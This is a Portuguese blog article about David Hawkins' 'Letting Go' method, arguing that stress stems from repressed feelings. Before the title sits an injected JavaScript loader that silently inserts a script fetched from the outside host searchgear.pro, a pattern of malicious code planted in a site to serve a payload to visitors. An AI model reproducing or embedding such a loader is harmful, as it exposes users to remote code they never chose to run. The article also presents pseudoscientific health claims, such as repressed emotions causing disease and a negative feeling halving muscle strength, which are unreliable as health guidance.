;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Estresse Não Vem de Fora, Vem de Dentro | David Hawkins Brasil
Categorias
David Hawkins

Estresse e Sentimentos Reprimidos

No último artigo sobre o método do Dr. David Hawkins, o Deixar Ir, falamos sobre os sentimentos e a maneira como lidamos com ele. Que tal agora olharmos o estresse e outros sentimentos reprimidos?

Sentimentos Reprimidos – a origem do Estresse

Cada dia mais escutamos falar do estresse como algo que vem de fora e nos afeta nos desequilibrando física, emocional e espiritualmente. 

Mas, será que o estresse é realmente fruto de fatores externos, de uma vida agitada e cheia de preocupações e compromissos, ou seria o estresse uma projeção daquilo que está dentro de nós? 

Segundo Dr. Hawkins o estresse nada mais é do que uma forma de deixarmos ir a pressão de sentimentos reprimidos. São eles que nos deixam vulneráveis ao estresse externo. 

Reagimos ao medo, por exemplo, de acordo com o quantum de medo que já existe dentro de nós. O medo interno cria uma projeção e passamos a ver o medo em tudo o que nos rodeia. Nesse sentido, o externo passa a ser um lugar perigoso porque nosso medo interno se projeta para tudo o que olhamos fora de nós. 

“A regra básica é que focamos no que reprimimos. Estresse é o resultado da pressão acumulada dos nossos sentimentos reprimidos e suprimidos.” (Dr.David Hawkins)

Sentimentos bloqueados e o adoecimento 

Reprimimos nossos sentimentos e essa energia retorna ao nosso sistema nervoso autônomo causando doenças. 

O estresse é isso, uma reação emocional a um estímulo que se precipita assim como seu nível é determinado por nossas crenças e pressões emocionais.

Dr. Hawkins cita o efeito do estresse nos testes musculares, que ele relata claramente em seu livro “Poder vs Força”. Um sentimento negativo provoca perda de 50% da força muscular e reduz a visão física e mental.

Qual é o grau de reatividade que temos aos estímulos externos? 

O mecanismo do Deixar Ir colabora para a diminuição da pressão interna desses sentimentos e das respostas do corpo físico ao estresse. 

Os programas de redução do estresse atuais 

Será que eles funcionam? Em que estão baseados?

Geralmente, o que vemos é a tentativa de aliviar o estresse após ele já estar estabelecido, Mas, qual é sua causa, sua origem?

“É como tentar reduzir a febre sem corrigir a infecção.”(Dr.Hawkins) 

 E por que não atuar na origem, naquilo que está subjacente, ou seja, os sentimentos reprimidos e suprimidos como a raiva, o medo, a culpa e outros sentimentos negativos que impactam nas nossas percepções e comportamentos diante das situações, das pessoas e do mundo. 

Sem essa consciência, do que realmente guardamos em nosso inconsciente, das emoções que soterramos, estaremos apenas cuidando da superfície do problema, mas não atingindo o centro da questão. 

Em seu livro “Deixar Ir”  Dr. Hawkins traz inúmeros exemplos de como o mecanismo do deixar ir pode beneficiar nossa saúde física e mental. Um verdadeiro tratado de como podemos cuidar dos nossos sentimentos e de nossa saúde.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *